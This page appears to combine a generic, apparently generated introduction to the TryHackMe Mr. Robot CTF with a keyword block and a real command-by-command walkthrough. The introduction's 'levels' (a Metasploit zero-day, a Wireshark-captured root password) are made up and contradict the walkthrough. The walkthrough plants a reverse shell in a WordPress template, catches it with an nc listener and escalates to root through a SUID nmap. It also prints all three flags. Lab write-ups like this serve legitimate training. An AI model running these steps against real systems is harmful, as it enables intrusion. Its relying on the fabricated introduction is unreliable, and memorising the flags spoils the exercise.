Introduction
The Mr. Robot CTF is a cybersecurity challenge that tests your penetration testing skills. The challenge requires you to hack into a virtual machine and obtain root access. The challenge is inspired by the TV show Mr. Robot and has several levels of difficulty.
Understanding the Challenge
The Mr. Robot CTF is a vulnerable virtual machine that has been intentionally designed to have security loopholes. The goal of the challenge is to find and exploit these loopholes to gain root access. The challenge has several levels, each with its own set of security vulnerabilities. Each level requires a specific set of skills and tools to complete.
Tools Required
The Mr. Robot CTF requires a specific set of tools to complete. The following tools are recommended:
Nmap: A network exploration tool that scans the target network for open ports, services, and vulnerabilities.
Metasploit: A penetration testing tool that is used to exploit known vulnerabilities in the target system.
John the Ripper: A password cracking tool that can be used to crack passwords and gain access to user accounts.
Wireshark: A network protocol analyzer that captures and displays network traffic.
Getting Started
To get started with the Mr. Robot CTF, you need to download the virtual machine and install it on your system. The virtual machine is available for download on the TryHackMe platform. Once you have downloaded the virtual machine, you need to import it into your virtualization software, such as VirtualBox or VMware.
Level 1
The first level of the Mr. Robot CTF is relatively easy and requires basic penetration testing skills. The objective of this level is to gain access to the user account on the target system. To complete this level, you need to perform the following steps:
Scan the target system with Nmap to identify open ports and services.
Use Metasploit to exploit a known vulnerability in the target system.
Use John the Ripper to crack the password for the user account.
Log in to the user account.
Level 2
The second level of the Mr. Robot CTF is more challenging than the first level and requires advanced penetration testing skills. The objective of this level is to gain access to the root account on the target system. To complete this level, you need to perform the following steps:
Scan the target system with Nmap to identify open ports and services.
Use Metasploit to exploit a known vulnerability in the target system.
Use Wireshark to capture network traffic and find the root password.
Log in to the root account.
Level 3
The third level of the Mr. Robot CTF is the most challenging and requires expert penetration testing skills. The objective of this level is to gain access to the target system by exploiting a zero-day vulnerability. To complete this level, you need to perform the following steps:
Scan the target system with Nmap to identify open ports and services.
Use Metasploit to exploit a zero-day vulnerability in the target system.
Use a reverse shell to gain remote access to the target system.
Escalate privileges to gain access to the root account.
Mr. Robot CTF
TryHackMe Mr. Robot
Mr. Robot CTF walkthrough
Mr. Robot CTF TryHackMe
Mr. Robot TryHackMe
Mr. Robot CTF solutions
TryHackMe Mr. Robot room
Mr. Robot CTF cheatsheet
Mr. Robot CTF hints
Mr. Robot CTF writeup
#1 - What is key 1?
Hint: Robots
Let’s get started with a Nmap scan. Nmap reveals 3 ports, 2 of which are opened (http and https). SSH seems to be closed.
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
Let’s start with the web server. Assisted by the hint, let’s get the robots.txt file. It discloses 2 hidden files, 1 of which being the key 1.
$ curl -s http://10.10.185.196/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
unknown@localhost:/data/documents/challenges/TryHackMe/Mr_Robot_CTF$ curl -s http://10.10.185.196/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
The second file is a dictionary, that we will probably need to use for the discovery of other locations.
$ head fsocity.dic
true
false
wikia
from
the
now
Wikia
extensions
scss
window
Key1: 073403c8a58a1f80d943455fb30724b9
#2 - What is key 2?
Hint: White coloured font
gobuster discovers several locations, including:
/login (Status: 302)
/wp-content (Status: 301)
/admin (Status: 301)
/wp-login (Status: 200)
/license (Status: 200)
/wp-includes (Status: 301)
Worpress is installed. Moreover, the directory /license discloses credentials:
$ curl -s http://10.10.185.196/license | tr -d "\n"
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?do you want a password or something?ZWxsaW90OkVSMjgtMDY1Mgo=
$ echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d
elliot:ER28-0652
Let’s try to use these credentials against Wordpress. It works and we are logged in as administrator! Several points to note here:
The WordPress version is 4.3.1. Considering the current version is 5.4.1, we are likely to find vulnerabilities.
There are 2 users:
username Name email profile
elliot Elliot Alderson elliot@mrrobot.com Administrator
mich05654 krista Gordon kgordon@therapist.com Subscriber
As we are administrators, we can modify the templates. Go to Appearance > Editor and edit the first template (404.php) by replacing the PHP code with a reverse shell taken from here. Make sure you put your local IP.
Now open a listener:
$ nc -nlvp 1234
And visit http://10.10.185.196/404.php to open the reverse shell.
We see our next key in /home/robot but it is only readable by the robot user.
$ ls -l /home/robot/
total 8
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
$ whoami
daemon
We are also provided with the MD5 hash of Mr Robot’s password:
$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
This hash was found here and the associated password is abcdefghijklmnopqrstuvwxyz. Let’s try to log in as robot.
$ su - robot
su: must be run from a terminal
Error… OK, not a problem, let’s spawn a shell with python (we first confirm python is installed):
$ which python
/usr/bin/python
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ su - robot
su - robot
Password: abcdefghijklmnopqrstuvwxyz
$ whoami
whoami
robot
$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
#3 - What is key 3?
Hint: nmap
Our last key is very likely in the /root directory, and we will need a privilege escalation to access it.
The nmap scan reveals that the port 22 (ssh) is closed, probably because the service is not started. We would need to elevate our privileges.
Unfortunately, our user robot is not in the sudoers:
$ sudo -l
sudo -l
[sudo] password for robot: abcdefghijklmnopqrstuvwxyz
Sorry, user robot may not run sudo on linux.
OK, let’s find what programs we have with the SETUID bit set owned by root:
$ find / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
Interestingly, nmap is on the list (it’s also the hint BTW). Besides, it’s a very old release (3.81), considering that the current release is 7.80 at the time of this writing.
$ which nmap
which nmap
/usr/local/bin/nmap
$ nmap --version
nmap --version
nmap version 3.81 ( http://www.insecure.org/nmap/ )
As described here, nmap is its older release (2.02 to 5.21) had an interactive mode which allows to execute commands.
Besides, nmap has the SETUID bit set, which means that we will be able to run commands as root:
$ ls -l /usr/local/bin/nmap
ls -l /usr/local/bin/nmap
-rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap
Let’s start nmap in interactive mode:
$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !whoami
!whoami
root
waiting to reap child : No child processes
nmap> !ls /root
!ls /root
firstboot_done key-3-of-3.txt
waiting to reap child : No child processes
nmap> !cat /root/key-3-of-3.txt
!cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
waiting to reap child : No child processes
3rd key: 04787ddef27c3dee1ee161b21670b4e4